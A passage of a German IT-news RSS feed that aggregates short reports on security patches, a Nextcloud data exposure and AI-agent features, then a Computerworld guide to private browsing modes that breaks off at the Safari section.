<p>„Microsoft hat ein Update für die Microsoft Malware Protection Engine veröffentlicht, das die unter der Kennung CVE-2026-50656 identifizierte Sicherheitslücke behebt. Weitere Informationen dazu, wie Sie überprüfen können, ob die neue Version installiert wurde, finden Sie in den FAQ“, teilte Microsoft zudem in einem <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-50656/" target="_blank" rel="noreferrer noopener">Supportdokument </a>mit.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=4-0-3178649-1-0-0-0-0?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<p>Kürzlich teilte derselbe Sicherheitsforscher Informationen über eine breite Palette von Sicherheitslücken in Windows mit, darunter Blue Hammer, Red Sun, Green Plasma, Mini Plasma, Yellow Key und Undefend. Und legte sich mit Microsoft selbst an, indem er seinen Unmut über dessen Security Response Center mit der Welt teilte.</p>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/2043389/windows-defender-einrichten-nutzen.html" target="_blank" rel="noreferrer noopener">Windows Defender optimal einrichten und nutzen</a></p>



<p><em>Dieser Artikel erschien zuerst bei unserer Schwesterpublikation </em><a href="https://www.pcforalla.se/" target="_blank" rel="noreferrer noopener"><em>PC för Alla</em></a><em> und wurde aus dem Schwedischen übersetzt und lokalisiert.</em></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Für Google Pixel-Handys: Diese Nutzer sollten das Juli-Update nicht verpassen]]></title>
<description><![CDATA[Wenn du mit deinem Pixel-Handy Teil des Beta-Programms bist, gibt es gute Neuigkeiten. Das Juli-Update behebt einen nervigen Fehler.]]></description>
<link>https://tsecurity.de/de/3656281/it-nachrichten/fuer-google-pixel-handys-diese-nutzer-sollten-das-juli-update-nicht-verpassen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656281/it-nachrichten/fuer-google-pixel-handys-diese-nutzer-sollten-das-juli-update-nicht-verpassen/</guid>
<pubDate>Thu, 09 Jul 2026 09:47:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wenn du mit deinem Pixel-Handy Teil des Beta-Programms bist, gibt es gute Neuigkeiten. Das Juli-Update behebt einen nervigen Fehler.]]></content:encoded>
</item>
<item>
<title><![CDATA[Offene Datenbank: Nextcloud GmbH behebt potenzielles Datenleck | heise online]]></title>
<description><![CDATA[IT & Tech · Developer · KI ... Ob Sicherheitslücken, Viren oder Trojaner – alle sicherheitsrelevanten Meldungen gibts bei heise security ...]]></description>
<link>https://tsecurity.de/de/3654981/it-security-nachrichten/offene-datenbank-nextcloud-gmbh-behebt-potenzielles-datenleck-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654981/it-security-nachrichten/offene-datenbank-nextcloud-gmbh-behebt-potenzielles-datenleck-heise-online/</guid>
<pubDate>Wed, 08 Jul 2026 19:23:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>IT</b> &amp; Tech · Developer · KI ... Ob Sicherheitslücken, Viren oder Trojaner – alle sicherheitsrelevanten Meldungen gibts bei heise <b>security</b> ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Offene Datenbank: Nextcloud GmbH behebt potenzielles Datenleck]]></title>
<description><![CDATA[Daten des Unternehmens hinter der populären Kollaborationslösung standen wegen einer Fehlkonfiguration offen im Netz. Die Software ist nicht betroffen.]]></description>
<link>https://tsecurity.de/de/3654675/it-security-nachrichten/offene-datenbank-nextcloud-gmbh-behebt-potenzielles-datenleck/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654675/it-security-nachrichten/offene-datenbank-nextcloud-gmbh-behebt-potenzielles-datenleck/</guid>
<pubDate>Wed, 08 Jul 2026 16:51:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Daten des Unternehmens hinter der populären Kollaborationslösung standen wegen einer Fehlkonfiguration offen im Netz. Die Software ist nicht betroffen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Offene Datenbank: Nextcloud GmbH behebt potenzielles Datenleck]]></title>
<description><![CDATA[Daten des Unternehmens hinter der populären Kollaborationslösung standen wegen einer Fehlkonfiguration offen im Netz. Die Software ist nicht betroffen.]]></description>
<link>https://tsecurity.de/de/3654631/it-nachrichten/offene-datenbank-nextcloud-gmbh-behebt-potenzielles-datenleck/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654631/it-nachrichten/offene-datenbank-nextcloud-gmbh-behebt-potenzielles-datenleck/</guid>
<pubDate>Wed, 08 Jul 2026 16:32:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Daten des Unternehmens hinter der populären Kollaborationslösung standen wegen einer Fehlkonfiguration offen im Netz. Die Software ist nicht betroffen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Synology Audio Station: Sicherheits-Update auf Version 7.2.1-6006 behebt diverse Fehler]]></title>
<description><![CDATA[  Kurzer Hinweis für alle Synology-Nutzer unter euch, die für ihre Musiksammlung noch auf die Audio Station und die mobile App DS audio setzen. Synology hat neulich ein Update auf die Version 7.2.1-6006 veröffentlicht, das eine ganze Reihe von Fehlern...Zum Beitrag: Synology Audio Station: Sicher...]]></description>
<link>https://tsecurity.de/de/3654248/it-nachrichten/synology-audio-station-sicherheits-update-auf-version-721-6006-behebt-diverse-fehler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654248/it-nachrichten/synology-audio-station-sicherheits-update-auf-version-721-6006-behebt-diverse-fehler/</guid>
<pubDate>Wed, 08 Jul 2026 14:18:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  Kurzer Hinweis für alle Synology-Nutzer unter euch, die für ihre Musiksammlung noch auf die Audio Station und die mobile App DS audio setzen. Synology hat neulich ein Update auf die Version 7.2.1-6006 veröffentlicht, das eine ganze Reihe von Fehlern...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/synology-audio-station-sicherheits-update-auf-version-7-2-1-6006-behebt-diverse-fehler/">Synology Audio Station: Sicherheits-Update auf Version 7.2.1-6006 behebt diverse Fehler</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[MCP-Server für Safari: Apple macht seinen Browser fit für KI-Agenten]]></title>
<description><![CDATA[Entwickler:innen können KI-Agenten künftig direkt in Safari einbinden. Eine macOS-Testversion ist bereits verfügbar. Das kannst du damit machen.weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3654239/it-nachrichten/mcp-server-fuer-safari-apple-macht-seinen-browser-fit-fuer-ki-agenten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654239/it-nachrichten/mcp-server-fuer-safari-apple-macht-seinen-browser-fit-fuer-ki-agenten/</guid>
<pubDate>Wed, 08 Jul 2026 14:18:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Entwickler:innen können KI-Agenten künftig direkt in Safari einbinden. Eine macOS-Testversion ist bereits verfügbar. Das kannst du damit machen.<a href="https://t3n.de/news/mcp-server-fuer-safari-apple-macht-seinen-browser-fit-fuer-ki-agenten-1751843/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apples Safari bekommt MCP-Server – Test läuft]]></title>
<description><![CDATA[Mit speziellen KI-Browsern und via Plug-ins lässt sich MCP bereits nutzen. Nun legt Apple es direkt in Safari nach.]]></description>
<link>https://tsecurity.de/de/3653736/it-nachrichten/apples-safari-bekommt-mcp-server-test-laeuft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653736/it-nachrichten/apples-safari-bekommt-mcp-server-test-laeuft/</guid>
<pubDate>Wed, 08 Jul 2026 11:03:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit speziellen KI-Browsern und via Plug-ins lässt sich MCP bereits nutzen. Nun legt Apple es direkt in Safari nach.]]></content:encoded>
</item>
<item>
<title><![CDATA[macOS is becoming a proving ground for AI agents]]></title>
<description><![CDATA[Somewhere right now, a Mac Mini is sitting on a shelf doing someone’s chores. Nobody’s watching it. It reads a version number out of Terminal, hops over to Safari, digs up a release year, then quietly files a reminder, the…
Read more →
The post macOS is becoming a proving ground for AI agents app...]]></description>
<link>https://tsecurity.de/de/3653327/it-security-nachrichten/macos-is-becoming-a-proving-ground-for-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653327/it-security-nachrichten/macos-is-becoming-a-proving-ground-for-ai-agents/</guid>
<pubDate>Wed, 08 Jul 2026 07:39:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Somewhere right now, a Mac Mini is sitting on a shelf doing someone’s chores. Nobody’s watching it. It reads a version number out of Terminal, hops over to Safari, digs up a release year, then quietly files a reminder, the…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/macos-is-becoming-a-proving-ground-for-ai-agents/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/macos-is-becoming-a-proving-ground-for-ai-agents/">macOS is becoming a proving ground for AI agents</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Auto: Neues Update behebt ab sofort ungewöhnlichen Fehler]]></title>
<description><![CDATA[Wer Android Auto nutzt, wird die zahlreichen Vor- und Nachteile des Systems bereits kennen. Besonders vorteilhaft ist zweifellos Googles schnelle Reaktion auf Fehler.]]></description>
<link>https://tsecurity.de/de/3653324/it-nachrichten/android-auto-neues-update-behebt-ab-sofort-ungewoehnlichen-fehler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653324/it-nachrichten/android-auto-neues-update-behebt-ab-sofort-ungewoehnlichen-fehler/</guid>
<pubDate>Wed, 08 Jul 2026 07:32:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wer Android Auto nutzt, wird die zahlreichen Vor- und Nachteile des Systems bereits kennen. Besonders vorteilhaft ist zweifellos Googles schnelle Reaktion auf Fehler.]]></content:encoded>
</item>
<item>
<title><![CDATA[macOS is becoming a proving ground for AI agents]]></title>
<description><![CDATA[Somewhere right now, a Mac Mini is sitting on a shelf doing someone’s chores. Nobody’s watching it. It reads a version number out of Terminal, hops over to Safari, digs up a release year, then quietly files a reminder, the kind of dull three-app errand a human would grumble through in ninety seco...]]></description>
<link>https://tsecurity.de/de/3653283/it-security-nachrichten/macos-is-becoming-a-proving-ground-for-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653283/it-security-nachrichten/macos-is-becoming-a-proving-ground-for-ai-agents/</guid>
<pubDate>Wed, 08 Jul 2026 07:08:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Somewhere right now, a Mac Mini is sitting on a shelf doing someone’s chores. Nobody’s watching it. It reads a version number out of Terminal, hops over to Safari, digs up a release year, then quietly files a reminder, the kind of dull three-app errand a human would grumble through in ninety seconds. The machine just works, hour after hour, an AI agent with hands on the keyboard and no one in the room. That … <a href="https://www.helpnetsecurity.com/2026/07/08/macos-ai-agents-automation/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/08/macos-ai-agents-automation/">macOS is becoming a proving ground for AI agents</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pixel Update: Das Juli-Update ist jetzt da – Google bringt wichtige Verbesserung auf die Smartphones]]></title>
<description><![CDATA[In diesem Monat etwas früher als erwartet, hat Google vor wenigen Stunden das Pixel Update für den Monat Juli veröffentlicht, das parallel zum monatlichen Sicherheitsupdate eine Reihe von Verbesserungen im Gepäck hat. Man behebt wichtige Probleme, die den Nutzern vielleicht etwas den Spaß getrübt...]]></description>
<link>https://tsecurity.de/de/3653279/it-nachrichten/pixel-update-das-juli-update-ist-jetzt-da-google-bringt-wichtige-verbesserung-auf-die-smartphones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653279/it-nachrichten/pixel-update-das-juli-update-ist-jetzt-da-google-bringt-wichtige-verbesserung-auf-die-smartphones/</guid>
<pubDate>Wed, 08 Jul 2026 07:02:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="490" src="https://www.googlewatchblog.de/wp-content/uploads/android-pixel-update-1024x784.jpg" class="attachment-large size-large wp-post-image" alt="android pixel update" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/android-pixel-update-1024x784.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/android-pixel-update-300x230.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/android-pixel-update-768x588.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/android-pixel-update-523x400.jpg 523w, https://www.googlewatchblog.de/wp-content/uploads/android-pixel-update-784x600.jpg 784w, https://www.googlewatchblog.de/wp-content/uploads/android-pixel-update.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>In diesem Monat etwas früher als erwartet, hat Google vor wenigen Stunden das <a href="https://www.googlewatchblog.de/2026/07/pixel-11-die-neuen-google-smartphones-werden-teurer-leak-verraet-speichervarianten-und-verkaufspreise/"><strong>Pixel Update</strong></a> für den Monat Juli veröffentlicht, das parallel zum monatlichen Sicherheitsupdate eine Reihe von Verbesserungen im Gepäck hat. Man behebt wichtige Probleme, die den Nutzern vielleicht etwas den Spaß getrübt haben, sodass sich alle auf Android 17 gewechselten Nutzer freuen dürfen. Wir zeigen euch, was im Update steckt.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/pixel-smartphones-update-jul2026/">Pixel Update: Das Juli-Update ist jetzt da – Google bringt wichtige Verbesserung auf die Smartphones</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/48a606c6a6914f0eb28d32bc43f7661c"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/48a606c6a6914f0eb28d32bc43f7661c" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/pixel-smartphones-update-jul2026/">Pixel Update: Das Juli-Update ist jetzt da – Google bringt wichtige Verbesserung auf die Smartphones</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to go incognito in Chrome, Edge, Firefox, and Safari]]></title>
<description><![CDATA[Private browsing. Incognito. Privacy mode.



Web browser functions like those trace their roots back more than a decade, and the feature — first found in a top browser in 2005 — spread quickly as one copied another, made tweaks and minor improvements.



But privacy-promising labels can be treac...]]></description>
<link>https://tsecurity.de/de/3652543/it-nachrichten/how-to-go-incognito-in-chrome-edge-firefox-and-safari/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652543/it-nachrichten/how-to-go-incognito-in-chrome-edge-firefox-and-safari/</guid>
<pubDate>Tue, 07 Jul 2026 20:51:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Private browsing. Incognito. Privacy mode.</p>



<p>Web browser functions like those trace their roots back more than a decade, and the feature — first found in a top browser in 2005 — spread quickly as one copied another, made tweaks and minor improvements.</p>



<p>But privacy-promising labels can be treacherous. Simply put, going “<a href="https://www.computerworld.com/article/1670600/you-are-not-very-incognito-in-incognito-mode.html" title="Incognito">incognito</a>” is as effective in guarding <a href="https://www.computerworld.com/article/1612064/cookie-conundrum-the-loss-of-third-party-trackers-could-diminish-your-privacy.html">online privacy</a> as witchcraft is in warding off a common cold.</p>



<p>That’s because private browsing is intended to wipe <i>local</i> traces of where you’ve been, what you’ve searched for, the contents of forms you’ve filled. It’s meant to hide, and not always conclusively at that, your tracks from others with access to the personal computer. That’s it.</p>



<h2 class="wp-block-heading">How to keep web browsing private</h2>



<p>We’ve spelled out how to go into incognito or private browsing mode for the four major browsers in this order: </p>



<ul class="wp-block-list">
<li>Google Chrome’s Incognito mode</li>



<li>Microsoft Edge’s InPrivate browsing</li>



<li>Mozilla Firefox’s New Private Window mode</li>



<li>Apple Safari’s New Private window mode</li>
</ul>



<p>At their most basic, these features promise that they won’t record visited sites to the browsing history, save cookies that show you’ve been to and logged into sites, or remember credentials like passwords used during sessions. But your traipses through the web are still <a href="https://www.computerworld.com/article/1611809/what-a-future-without-browser-cookies-will-look-like.html">traceable by Internet providers</a> – and the authorities who serve subpoenas to those entities – employers who control the company network and advertisers who follow your every footstep.</p>



<p>To end that cognitive dissonance, <a href="https://www.computerworld.com/article/1639403/online-privacy-best-browsers-settings-and-tips.html">most browsers have added more advanced privacy tools</a>, generically known as “anti-trackers,” which block various kinds of bite-sized chunks of code that advertisers and websites use to trace where people go in attempts to compile digital dossiers or serve targeted advertisements.</p>



<p>Although it might seem reasonable that a browser’s end game would be to craft a system that blends incognito modes with anti-tracking, it’s highly unlikely. Using either private browsing or anti-tracking carries a cost: site passwords aren’t saved for the next visit or sites break under the tracker scrubbing. Nor are those costs equal. It’s much easier to turn on some level of anti-tracking by default than it would be to do the same for private sessions, as evidenced by the number of browsers that do the former without complaint while <i>none</i> do the latter.</p>



<p>Private browsing will, by necessity, always be a niche, as long as sites rely on cookies for mundane things like log-ins and cart contents.</p>



<p>But the mode remains a useful tool whenever the browser — and the computer it’s on — are shared. To prove that, we’ve assembled instructions and insights on using the incognito features — and anti-tracking tools — offered by the top four browsers: <a title="Google Chrome" href="https://www.computerworld.com/article/1719300/a-mac-user-s-guide-to-the-google-chrome-browser.html">Google Chrome</a>, Microsoft’s <a href="https://www.computerworld.com/article/1713244/how-to-replace-edge-as-windows-default-browser.html">Chromium-based Edge</a>, Mozilla’s Firefox and Apple’s Safari.</p>



<h2 class="wp-block-heading">How to go incognito with Google Chrome</h2>



<p>Although <i>incognito</i> may be a synonym to some users for any browser’s private mode, Google gets credit for grabbing the word as the feature’s snappiest name when it launched the tool in late 2008, just months after Chrome debuted.</p>



<p>The easiest way to open an Incognito window is with the keyboard shortcut combination <strong>Ctrl-Shift-N</strong> (Windows) or <strong>Command-Shift-N</strong> (macOS).</p>



<p>Another way is to click on the menu on the upper right — it’s the three vertical dots — and select <strong>New Incognito Window</strong> from the list.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="876" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Open a new Incognito window in Chrome using keyboard shortcuts or from the menu by choosing “New Incognito window.”</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>The new Incognito window can be recognized by the dark background and the stylized “spy” icon just to the left of the three-dots menu. Chrome also reminds users of just what Incognito does and doesn’t do each time a new window is opened. The message may get tiresome for regular Incognito users, but it may also save a job or reputation; it’s important that users remember Incognito doesn’t prevent ISPs, businesses, schools and organizations from knowing where customers, workers, students, and others went on the web or what they searched for.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="699" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Each time a new Incognito window is opened, Chrome reminds users what Incognito doesn’t save. The browser also puts a toggle on the screen for blocking third-party cookies.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>Incognito’s introductory screen also displays a toggle — it’s on by default — along with text that states third-party cookies will be blocked while in the privacy mode. Although cookies are never saved locally as long as the user stays in Incognito, websites have been able to track user movements from site to site <i>while within Incognito</i>. Such tracking might be used, for example, to display ads to a user visiting multiple sites in Incognito. This third-party cookie blocking, which halts such behavior, debuted in May 2020.</p>



<p>Google has been experimenting with new language on Chrome’s Incognito introductory page, but it’s yet to make it to the desktop browser. In the Canary build of Chrome on Android, however, the intro now outlines “What Incognito does” and “What Incognito doesn’t do,” to make the mode’s capabilities somewhat clearer to the user. (Some have speculated that the changes were made in reaction to a still-ongoing class-action lawsuit file in 2020 that alleged Google continued to track users’ online behavior and movements in Incognito.)</p>



<p>Once a tab in Incognito has been filled with a website, Chrome continues to remind users that they’re in Incognito by the dark background of the address bar and window title.</p>



<p>A link on an existing page can be opened directly into Incognito by right-clicking the link, then choosing <strong>Open Link in Incognito Window</strong> from the resulting menu.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="876" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>What Incognito looks like after pulling up a website. Note the “spy” icon at the right of the address bar.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p><strong>Pro tip</strong><em><strong>:</strong> To close an Incognito window, shutter it like any other Chrome window by clicking the X in the upper right corner (Windows) or the red dot in the upper left (macOS).</em></p>



<h2 class="wp-block-heading">How to privately browse with Microsoft Edge</h2>



<p>Microsoft borrowed the name of its private browsing mode, InPrivate, from Internet Explorer (IE), the finally-being-retired legacy browser. InPrivate appeared in IE in March 2009, about three months after Chrome’s Incognito and three months before Firefox’s privacy mode. When Edge was first released in 2015 and then relaunched as a clone of Chrome in January 2020, InPrivate was part of the package, too.</p>



<p>At the keyboard, the combination of <strong>Ctrl-Shift-N</strong> (Windows) or <strong>Command-Shift-N</strong> (macOS) opens an InPrivate window.</p>



<p>A slower way to get there is to click on the menu at the upper right — it’s three dots arranged horizontally — and choose <strong>New InPrivate Window</strong> from the menu.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="874" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Like other browsers, Edge will take you incognito from the menu when you pick New InPrivate window.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p>Edge does a more thorough job of explaining what its private browsing mode does and doesn’t do than any of its rivals, with on-screen paragraphs dedicated to describing what data the browser collects in InPrivate and how the strictest additional anti-tracking setting can be called on from within the mode. In addition, Edge uses the more informal “What Incognito does” and “What Incognito doesn’t do” language on its InPrivate introductory screen.</p>



<p>Microsoft’s browser also well marks InPrivate when the mode is operating: an oval marked “In Private” to the right of the address bar combines with a full-black screen to make sure users know where they’re at.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="843" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Edge offers a detailed explanation of what its private browsing mode does and doesn’t do.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p>It’s also possible to launch an InPrivate session by right-clicking a link within Edge and selecting <strong>Open in InPrivate Window</strong>. That option is grayed out when already in a private browsing session but using <strong>Open Link in New Tab</strong> does just that within the current InPrivate frame.</p>



<p>To end InPrivate browsing, simply shut the window by clicking the X in the upper right corner (Windows) or click the red dot at the upper left (macOS).</p>



<p>Although Edge is based on Chromium, the same open-source project that comes up with the code to power Chrome, the Redmond, WA company integrated anti-tracking into its browser. Dubbed “Tracking Prevention,” it works both in Edge’s standard and InPrivate modes.</p>



<p>To set Tracking Prevention, choose <strong>Settings</strong> from the three-ellipses menu at the right, then at the next page, pick <strong>Privacy, Search and Services</strong>. Choose one of the three options — <strong>Basic, Balanced</strong> or <strong>Strict</strong> — and make sure the toggle for <strong>Tracking prevention</strong> is in the “on” position. If you want InPrivate to always default to the harshest anti-tracking — not a bad idea — toggle <strong>Always use “Strict” tracking prevention when browsing InPrivate</strong> to “on.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="708" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Toggle Always use Strict to the ‘on’ position and InPrivate will apply the most stringent anti-tracking even though Edge’s standard mode is set to, say, Balanced.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p><strong>Pro tip:</strong> <i>To open Edge with InPrivate — rather than first opening Edge in standard mode, then launching InPrivate — right-click the Edge icon in the Windows taskbar and select <strong>New InPrivate Window</strong> from the list. There is no similar one-step way to do this in macOS.</i></p>



<h2 class="wp-block-heading">How to privately browse with Mozilla Firefox</h2>



<p>After Chrome trumpeted Incognito, browsers without something similar hustled to catch up. Mozilla added its take — dubbed Private Browsing — about six months after Google, in June 2009.</p>



<p>From the keyboard, a private browsing session can be called up using the combination <strong>Ctrl-Shift-P</strong> (Windows) or <strong>Command-Shift-P</strong> (macOS).</p>



<p>Alternately, a private window will open from the menu at the upper right of Firefox — three short horizontal lines — after selecting <strong>New private window</strong>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="889" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Opening a private browsing window is as simple as choosing New Private Window from the Firefox menu.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p>A private session window is marked by the purple “mask” icon in the title bar of the Firefox frame. In Windows, the icon is to the left of the minimize/maximize/close buttons; on a Mac, the mask squats at the far right of the title bar. Unlike Chrome and Edge, Firefox does not color-code the top components of the browser window to signify the user is in privacy mode.</p>



<p>Like other browsers, Firefox warns users that private browsing is no cure-all for privacy ills but is limited in what it blocks from being saved during a session. “Private window: Firefox clears your search and browsing history when you close all private windows. This doesn’t make you anonymous,” the caution reads.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="654" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Firefox reminds users that while a private session doesn’t save searches or browsing histories, it doesn’t cloak them in complete anonymity. The page also links to more detailed information.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p>A link can be opened into a Firefox Private Window by right-clicking the link, then choosing <strong>Open Link in New Private Window</strong> from the menu.</p>



<p>To close a Private Window, shut it down just as one would any Firefox window by clicking the X in the upper right corner (Windows) or the red dot in the upper left (macOS).</p>



<p>Notable is that Firefox’s private browsing mode is accompanied by the browser’s superb “Enhanced Tracking Protection,” a suite of tracker blocking tools that stymie all sorts of ad-and-site methods for identifying users, then watching and recording their online behavior. While the earliest version of this was offered only inside Private Windows, the expanded technologies also work within standard mode.</p>



<p>Because Enhanced Tracking Protection is enabled by default within Firefox, it doesn’t matter which of its settings — <strong>Standard, Strict</strong> or <strong>Custom</strong> — is selected as far as private browsing goes; everything that can be blocked will be blocked.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>The shield appears in the address bar to note what trackers were blocked by Firefox in a Private Window. Clicking on the icon brings up an accounting of what was barred.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p><strong>Pro tip:</strong> <i>Private Browsing sessions take place over the more secure HTTPS, not the once-standard HTTP protocol. Users don’t need to do anything: The new HTTPS-only policy is on by default. (If the destination site doesn’t support HTTPS, Firefox will go into fallback mode, connecting via HTTP instead.)</i></p>



<h2 class="wp-block-heading">How to browse privately with Apple’s Safari</h2>



